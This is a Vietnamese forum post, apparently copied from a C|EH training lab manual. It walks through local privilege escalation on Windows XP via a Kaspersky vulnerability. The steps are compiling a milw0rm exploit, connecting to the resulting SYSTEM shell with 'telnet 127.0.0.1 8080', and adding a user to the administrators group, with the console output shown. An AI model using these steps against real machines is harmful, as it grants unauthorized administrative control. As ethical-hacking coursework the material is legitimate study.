itprofes
Bạn có muốn phản ứng với tin nhắn này? Vui lòng đăng ký diễn đàn trong một vài cú nhấp chuột hoặc đăng nhập để tiếp tục.

System Hacking - Bài 3 - Nâng quyền thông qua chương trình Kaspersky Lab

Go down

System Hacking - Bài 3 - Nâng quyền thông qua chương trình Kaspersky Lab Empty System Hacking - Bài 3 - Nâng quyền thông qua chương trình Kaspersky Lab

Bài gửi  admin 25/5/2010, 12:54 pm

Bài viết liên quan:Bài 2 - Sử dụng chương trình pwdump3v2 khi có được 1 user administrator của máy nạn nhân để có thể tìm được thông



Đối với việc nâng quyền trong một hệ thống hacker phải lợi dụng lỗ hổng nào đó, hoặc là từ hệ điều hành, hoặc là từ những phần mềm của hãng thứ 3, trong trường hợp này, chúng ta nâng quyền thông qua phần mềm diệt Virus là Kaspersky Lab. Để chuẩn bị bài lab này, chúng ta lên trang web www.milw0rm.com để tìm thông tin về đoạn mã khai thác này.

System Hacking - Bài 3 - Nâng quyền thông qua chương trình Kaspersky Lab Kythuatvien_Attachments_4817_20090513_025157_GF
Sau đó ta sử dụng đoạn code này biên dịch thày file exe để tấn công vào máy nạn nhân. Để thực hành bài Lab, ta cần phải cài phần mềm Kaspersky vào máy. Sau khi cài xong ta thêm vào máy 1 user bình thường,và tiến hành log on vào user này, Trong bài ta sử dụng user hao và password là hao.
System Hacking - Bài 3 - Nâng quyền thông qua chương trình Kaspersky Lab Kythuatvien_Attachments_36717_20090513_025244_GF
Chạy file exe đã được biên dịch để exploit vào Kaspersky đang chạy dưới quyền admin hệ thống.
System Hacking - Bài 3 - Nâng quyền thông qua chương trình Kaspersky Lab Kythuatvien_Attachments_36717_20090513_025352_GF
Sử dụng lệnh “ telnet 127.0.0.1 8080 “ để truy xuất vào shell có quyền admin hệ thống. Ta tiếp tục sử dụng lệnh “ Net Localgroup administrators hao /add” để add user “ hao” vào nhóm admin, và sử dụng lệnh net user để tái xác nhận


Code:
  1. Microsoft Windows XP [Version 5.1.2600]
  2.

      (C) Copyright 1985-2001 Microsoft Corp.
  3.

  4.


      D:\WINDOWS\system32>
  5.

      D:\WINDOWS\system32>net Localgroup administrators hao /add
  6.

      net Localgroup administrators hao /add
  7.

      The command completed successfully.
  8.

  9.


      D:\WINDOWS\system32>net user hao
  10.

      net user hao
  11.

      User name hao
  12.

      Full Name
  13.

      Comment
  14.

      User's comment
  15.

      Country code 000 (System Default)
  16.

      Account active Yes
  17.

      Account expires Never
  18.

  19.


      Password last set 8/3/2007 1:47 PM
  20.

      Password expires 9/15/2007 12:35 PM
  21.

      Password changeable 8/3/2007 1:47 PM
  22.

      Password required Yes
  23.

      Giáo trình bài tập C|EH Tài liệu dành cho học viên
  24.

      VSIC Education Corporation Trang 25
  25.

      User may change password Yes
  26.

  27.


      Workstations allowed All
  28.

      Logon script
  29.

      User profile
  30.

      Home directory
  31.

      Last logon 8/3/2007 1:54 PM
  32.

  33.


      Logon hours allowed All
  34.

  35.


      Local Group Memberships *Administrators *Users
  36.

      Global Group memberships *None
  37.

      The command completed successfully.
  38.

  39.
        D:\WINDOWS\system32>


Ta thấy user “ hao” bây giờ đã có quyền Admin trong hệ thống, và việc nâng quyền đã thành công. Các bạn có thể test những phần mềm tường tự từ code down từ trang www.milw0rm.com.
admin
admin
Thiếu Úy III
Thiếu Úy III

Tổng số bài gửi : 627
Diem : 6547
Thank : 4
Join date : 24/03/2010
Đến từ : Bỉm Sơn - Thanh hóa

https://itprofes.forumvi.com

Về Đầu Trang Go down

Về Đầu Trang

- Similar topics

 
Permissions in this forum:
Bạn không có quyền trả lời bài viết